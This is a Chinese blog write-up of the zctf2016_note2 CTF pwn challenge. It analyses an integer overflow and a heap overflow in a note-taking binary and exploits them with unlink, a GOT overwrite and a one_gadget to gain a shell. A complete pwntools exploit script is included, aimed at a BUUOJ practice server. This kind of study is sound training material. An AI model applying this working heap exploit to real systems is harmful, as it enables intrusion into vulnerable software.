zctf2016_note2【write up】

最新推荐文章于 2024-06-22 11:20:12 发布
最新推荐文章于 2024-06-22 11:20:12 发布
阅读量73 收藏
点赞数
分类专栏: pwn刷题 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73756460/article/details/130044752
版权
文章详细描述了如何解决一个CTF挑战,涉及64位程序的安全性,包括检查NX和Canary保护,分析程序漏洞(整数溢出和堆溢出),利用这些漏洞进行堆操作(如unlink),泄露libc地址,以及通过one_gadgetgadget获取控制权的过程。
摘要由CSDN通过智能技术生成

zctf2016_note2

惯例我们先来checksec一下

开启了NX和canary的64位程序

请添加图片描述

放进ida64里看看(此题去除了符号表 此处的函数名都是笔者自己写的)

去除了符号表 旨在考验我们的代码审计能力 所幸这提示比较规律的菜单题我们可以较为轻松的将函数名给填上去

请添加图片描述

my_read

请添加图片描述

漏洞点此处当size=0时存在整数溢出

add chunk

请添加图片描述

show chunk

非常标准的show_chunk 不存在漏洞

在这里插入图片描述

edit chunk

此处存在堆溢出漏洞可以方便我们修改内容

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-vom9w1Tr-1681032025710)(1681025872095.png)]

delete chunk

非常标准的free_chunk的过程 不存在uaf漏洞

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-FmN5JDwF-1681032025710)(1681024982399.png)]

审题完成,开始解题

由于我们可以利用整数溢出来篡改其他堆的内容因此我们考虑使用unlink操作

首先我们先申请三个chunk

此处我们已经可以在chunk0中部只好我们的fakechunk了

ptr=0x602120
fd=ptr-0x18
bk=ptr-0x10
payload=p64(0x0)+p64(0xa1)+p64(fd)+p64(bk)
add(0x80,payload)   #chunk0
add(0x10,'bbbb')   #chunk1
add(0x80,'cccc')#chunk2

然后将chuunk1free掉后再次申请chunk1 注意此处我们再次申请的chunk1的大小为0x0 要利用整数溢出漏洞来篡改chunk2的prev size和size位 然后我们再将chunkfree掉 这时我们的chunk0就已经指向ptr了

delete(1)
payload=p64(0)*2+p64(0xa0)+p64(0x90)
add(0,payload)
delete(2)

此时我们修改chunk0上的内容(即修改ptr上的内容)将本应存储chunk0地址上的内容篡改为free_got的地址

payload=b'a'*0x18+p64(free_got)
edit(0,payload)

接下来我们show chunk0 将chunk0上的内容打印出来(即打印free_got上的内容即free_addr)

然后接收free_addr 这样我们就泄露出来libc 由于free函数没有free chunk上的内容因此我们优先考虑使用one_gadget来获取控制权 将chunk0的内容(free_got上的内容)更改为one_gadget的地址

由于edit函数的最后一步是执行free(v7);因此我们不需要额外delete一个chunk即可搭乘夺取控制权的目的

show(0)
io.recvuntil('is ')
print('1')
free_addr = u64(io.recv(6).ljust(8, "\x00"))
#free_addr = u64(io.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))
base=free_addr-libc.sym['free']
print(hex(base))
payload=p64(base+one_gadget)
edit(0,payload)
io.interactive()

然后我们就可以得到我们的flag了

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-nWoaXxfq-1681032025710)(1681030970832.png)]

exp:

from pwn import *
io=remote('node4.buuoj.cn',26019)
#io=process('./note2')
context.log_level='debug'
elf=ELF('./note2')
libc=ELF('./libc-2.23.so')

one_gadget=0xf02a4
free_got=elf.got['free']
ptr=0x602120
fd=ptr-0x18
bk=ptr-0x10
def add(size,content):
	io.recvuntil('--->>')
	io.sendline(b'1')
	io.recvuntil(':(less than 128)')
	io.sendline(str(size))
	io.recvuntil('content:')
	io.sendline(content)

def show(idx):
	io.recvuntil('--->>')
	io.sendline(b'2')
	io.recvuntil('the note:')
	io.sendline(str(idx))
	
def edit(idx,content):
	io.recvuntil('--->>')
	io.sendline(b'3')
	io.recvuntil('the note:')
	io.sendline(str(idx))
	io.recvuntil('[1.overwrite/2.append]')
	io.sendline(b'1')
	io.recvuntil(':')
	io.sendline(content)

def delete(idx):
	io.recvuntil('--->>')
	io.sendline(b'4')
	io.recvuntil('the note:')
	io.sendline(str(idx))

io.recvuntil('name:')
io.sendline(b'aaaa')
io.recvuntil('address:')
io.sendline(b'aaaa')
payload=p64(0x0)+p64(0xa1)+p64(fd)+p64(bk)
add(0x80,payload)   #chunk0
add(0x10,'bbbb')   #chunk1
add(0x80,'cccc')#chunk2
delete(1)
payload=p64(0)*2+p64(0xa0)+p64(0x90)
add(0,payload)
delete(2)
#payload=p64(0)+p64(free_got)
payload=b'a'*0x18+p64(free_got)
edit(0,payload)
show(0)
io.recvuntil('is ')
print('1')
free_addr = u64(io.recv(6).ljust(8, "\x00"))
#free_addr = u64(io.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))
base=free_addr-libc.sym['free']
print(hex(base))
payload=p64(base+one_gadget)
edit(0,payload)
io.interactive()
爱若 AI_ruo
关注
专栏目录
合天网安实验室CTF-Web100-Give Me Flag
MyCyber
06-09 1191
合天网安实验室CTF-Web100-Give Me Flag 题目描述   哎,不小心把代码弄乱惹 相关附件   web100.zip 参考解题步骤 1、下载附件打开后是一段JavaScript代码,但看起来被混淆了 源文件是没有换行的,我这里手动换行以便观察 2、试了一下直接翻译,比如很容易看出getEleById中的 = ment,但后面的就很难判断了。于是调整思路,直接用Chrome跑一下看看。(注意要将上一步的手动换行还原) 调试界面的代码 还是不清楚,但可以看出大体的代码逻辑:   1
BUUCTF-PWN刷题记录-10
weixin_44145820的博客
04-19 861
目录wustctf2020_number_game(neg操作原理)zctf2016_note2(强制转换溢出,unlink)wustctf2020_name_your_cat wustctf2020_number_game(neg操作原理) 需要输入一个数,变为负数之后还是负数 这题就设计计组知识了,neg的操作为按位取反+1,而0x80000000取反加一之后仍然是0x80000000,所以...
zctf_2016_note2
xieyichensss的博客
07-03 153
这是一道unlink的题,非常经典。 unlink是什么,顾名思义,就是把其中一个chunk块给free掉。会将堆块的地址变成存放堆块地址的地址附近。 看图 需要绕过的检查: 1.后一个堆快的prev_size为要为unlink堆块的大小。并且pre_inuse要为0,只有这样,prev_size才有效。 2.需要构造fake_fd,fake_bk。 (这里不考虑large_bin的检测) fd_nextsize和bk_nextsize 思路 1.首先一定要泄露libc基址,这样才能向下进行攻击。那么,如
zctf2016_note2
seaaseesa的博客
04-17 807
zctf2016_note2 首先,检查一下程序的保护机制 然后用IDA分析一下,在edit函数里存在一个溢出漏洞,我们只需要让v6-strlen(&dest) == 0,即可绕过’\0’的截断,实现溢出。因此我们只需add(0,’’),即可利用这个chunk来溢出,由于PIE也没开启并且堆指针保存在bss段,因此做unsorted bin unlink比较简单。 需要...
[Buuoj]zctf2016_note2
zylxixixi的博客
11-10 318
思路一: 利用house系列的中的house of force,将goodbye_message的地址覆盖为magic的地址,从而输出flag地址 思路二 利用unlink漏洞,泄露libc基址并且将atoi的got表项修改为system的地址,最后输入/bin/sh
[BUUCTF]zctf2016_note2
zyxx_wjc的博客
08-13 1131
BUUCTF刷题wp分享:zctf2016_note2
【ZCTF】easy reverse 详解
wodafa的博客
03-02 1120
0x01  前言     团队逆向牛的解题思路,分享出来~ 0x02  内容 0. 样本 bbcdd1f7-9983-4bf4-9fde-7f77a6b947b4.dll 1. 静态分析 使用IDAPro逆向分析样本,样本较小,得到方法列表: 调用关系: PS: 开始受调用关系误导,分析DLL入口函数调用的几个方法,浪费了时间。
ctf解密图片得到flag_CTF中图片隐写的一些整理总结
weixin_39983223的博客
12-20 8218
对历年来国内外CTF中常见的题型图片隐写的一些总结,本文长期更新,及时补充新的题型。对历年来国内外CTF中常见的题型图片隐写的一些总结赛题XMAN-qualifiers-2017 : Misc/SimpleGIf考察点Gif文件头隐写相关技巧Python 脚本编写工具010EditorLinux identify命令Visual Studio Code附件WriteupGIF头补全首先用file查...
图片隐写 安恒ctf_图片隐写 安恒ctf_CTF中图片隐写的一些整理总结
weixin_35012535的博客
02-05 1697
对历年来国内外CTF中常见的题型图片隐写的一些总结,本文长期更新,及时补充新的题型。对历年来国内外CTF中常见的题型图片隐写的一些总结赛题XMAN-qualifiers-2017 : Misc/SimpleGIf考察点Gif文件头隐写相关技巧Python 脚本编写工具010EditorLinux identify命令Visual Studio Code附件WriteupGIF头补全首先用file...
2016 ZCTF——note2
04-20 354
64位程序,没开PIE  #unlink 程序逻辑 1 void __fastcall main(__int64 a1, char **a2, char **a3) 2 { 3 setvbuf(stdin, 0LL, 2, 0LL); 4 setvbuf(stdout, 0LL, 2, 0LL); 5 setvbuf(stderr, 0LL, 2...
【unlink】 zctf2016_note2
huzai9527的博客
04-19 238
【unlink】 zctf2016_note2 1.ida分析 堆溢出,unsigned int用于判断条件,导致的堆溢出 指针数组 2.思路 创建3个chunk,chunk0、chunk1、chunk2,通过chunk1连接chunk0,chunk2。构造unlink 在chunk0,构造fake chunk,free(chunk1)然后再申请修改chunk2的size,add(0,'b'*0x10 + p64(0xa0)+p64(0x90)) 释放chunk2,unlin
2016_ZCTF_Pwn note2(unlink)
Pwnpanda的博客
08-05 607
暑假学习计划 - 0x03 2016_ZCTF_note2 详细分析参考:CTF Wiki 肝了一下午 + 一晚上,还是有一部分还不是很理解: ①为什么payload1后面一定要加上p64(64)+p64(0x60),为什么不能删除或者改大小; ②分配的三个堆块,为什么第一个和第三个大小一定是0x80; 路过的各位大佬,如果知道麻烦指点一些,谢谢啦 from pwn import...
[BUUCTF]PWN——zctf2016_note2(unlink)
mcmuyanga的博客
02-07 848
zctf2016_note2 附件 步骤 例行检查,64位程序,开启了canary和nx 试运行一下,看看大概的情况,经典的堆题的菜单 64位ida载入,方便看程序,我修改了函数名 New_note() 定义的时候i是unsigned_int64,但是for循环里的i是int64.我们都知道,在c语言中,无符号变量和有符号变量比较时,会将有符号变量转化为无符号变量来比较。所以这里size为0的时候。(unsigned int)(size-1)就就是非常大的整数,存在整数溢出漏洞 show_not
zctf2016_note2-堆利用-unlink
Sa1nZen的博客
06-22 241
zctf2016_note2-堆利用-unlink
2016 ZCTF note2 题解
coco的博客
12-01 901
程序分析 先查看程序开启的保护,可以看到没有开启PIE。并且也是一个经典的菜单程序。 new note函数 可以看到,我们一共能申请四个堆块,堆块的指针,数量都存储在bss端上。我们能申请超过0x80的堆块,并在其中写入内容,这里的大小被限制了。但是我们进入my_read函数后就能发现for循环的条件中,size为int类型,而i是unsigned int类型。我们都知道,在c语言中,无符号变...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8472
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
基于matlab平抑风电波动的电-氢混合储能容量优化配置【含Matlab源码 期】.zip
09-27
CSDN海神之光上传的全部代码均可运行,亲测可用,直接替换数据即可,适合小白; 1、代码压缩包内容 主函数:main.m; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,可私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开main.m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描博主博客文章底部QQ名片; 4.1 CSDN博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作
dynamic_unet-0.0.2-py3-none-any.whl
最新发布
09-27
dynamic_unet-0.0.2-py3-none-any.whl
基于Java语言的动态二维码生成与绘制设计源码
09-27
该项目是一款基于Java语言的动态二维码生成与绘制设计源码,包含126个文件,包括64个JAR包、24个PNG图片、17个GIF动画、10个XML配置、7个Java源文件、2个Markdown文件、1个Idea项目配置文件和1个JPG图片文件。该项目通过图像生成动态二维码,适用于需要动态二维码绘制的场景。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值